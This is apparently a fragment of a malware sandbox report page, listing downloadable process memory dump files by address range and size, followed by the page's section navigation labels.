
Download
memory/2564-200-0x00007FF831C60000-0x00007FF831D1E000-memory.dmp

Filesize
760KB

Download
memory/2564-194-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2564-203-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2564-199-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

Filesize
2.0MB

Download
memory/2564-205-0x00007FF832C10000-0x00007FF832E05000-memory.dmp

Filesize
2.0MB

Download
memory/2604-132-0x00000000006A0000-0x0000000000B26000-memory.dmp

Filesize
4.5MB

Download
memory/2604-133-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/2604-139-0x00000000036D0000-0x00000000036E2000-memory.dmp

Filesize
72KB

Download
memory/2604-178-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/2712-185-0x0000000000000000-mapping.dmp

Download
memory/3036-154-0x0000000000000000-mapping.dmp

Download
memory/3136-173-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-156-0x0000000000000000-mapping.dmp

Download
memory/3136-165-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/3216-163-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3216-157-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3216-158-0x0000000140001844-mapping.dmp

Download
memory/3216-159-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3216-160-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3216-164-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/3264-186-0x0000000000000000-mapping.dmp

Download
memory/3516-172-0x0000000000000000-mapping.dmp

Download
memory/4048-166-0x0000000000000000-mapping.dmp

Download
memory/4048-180-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/4088-151-0x0000000000000000-mapping.dmp

Download
memory/4240-174-0x0000000000000000-mapping.dmp

Download
memory/4312-153-0x0000000000000000-mapping.dmp

Download
memory/4456-169-0x0000000000000000-mapping.dmp

Download
memory/4456-171-0x0000000000940000-0x0000000000948000-memory.dmp

Filesize
32KB

Download
memory/4456-184-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/4512-182-0x0000000000000000-mapping.dmp

Download
memory/4600-145-0x0000000000000000-mapping.dmp

Download
memory/4632-144-0x0000000000000000-mapping.dmp

Download
memory/4664-142-0x0000000000000000-mapping.dmp

Download
memory/4672-138-0x0000000000000000-mapping.dmp

Download
memory/4832-136-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmp

Filesize
10.8MB

Download
memory/4832-135-0x000001536ADF0000-0x000001536AE12000-memory.dmp

Filesize
136KB

Download
memory/4832-134-0x0000000000000000-mapping.dmp

Download
memory/4892-150-0x0000000000000000-mapping.dmp

Download
memory/5068-146-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads